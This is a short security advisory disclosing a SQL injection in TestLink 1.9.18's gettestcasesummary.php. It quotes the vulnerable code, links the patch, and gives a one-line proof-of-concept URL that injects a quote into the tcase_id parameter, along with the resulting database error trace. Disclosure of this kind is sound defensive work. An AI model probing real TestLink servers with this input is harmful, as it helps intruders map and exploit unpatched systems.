Testlink 1.9.18 gettestcasesummary.php SQL Injection 0day

2018.06.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Affected software: Testlink 1.9.18 and prior Credit: Maksymilian Arciemowicz (CXSECURITY) Affected code: ---------------- $tcase_id = isset($_REQUEST['tcase_id']) ? $_REQUEST['tcase_id']: null; $tcversion_id = isset($_REQUEST['tcversion_id']) ? $_REQUEST['tcversion_id']: 0; $info = ''; if( !is_null($tcase_id) ) { if($tcversion_id > 0 ) { $tcase = $tcase_mgr->get_by_id($tcase_id,$tcversion_id); ---------------- Patch: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/2c85dc8f472f4eedba70a24456be5239dc3045a3 PoC http://localhost/lib/ajax/gettestcasesummary.php?tcase_id=1%27 Error message and SQL Syntax: ============================================================================== DB Access Error - debug_print_backtrace() OUTPUT START ATTENTION: Enabling more debug info will produce path disclosure weakness (CWE-200) Having this additional Information could be useful for reporting issue to development TEAM. ============================================================================== #0 database->exec_query(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:563] #1 database->fetchFirstRow(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:545] 0000002 database->fetchFirstRowSingleColumn(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' , version) called at [/opt/bitnami/testlink/lib/functions/testcase.class.php:1977] 0000003 testcase->get_last_version_info(1') called at [/opt/bitnami/testlink/lib/ajax/gettestcasesummary.php:35]

References:

https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/2c85dc8f472f4eedba70a24456be5239dc3045a3


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top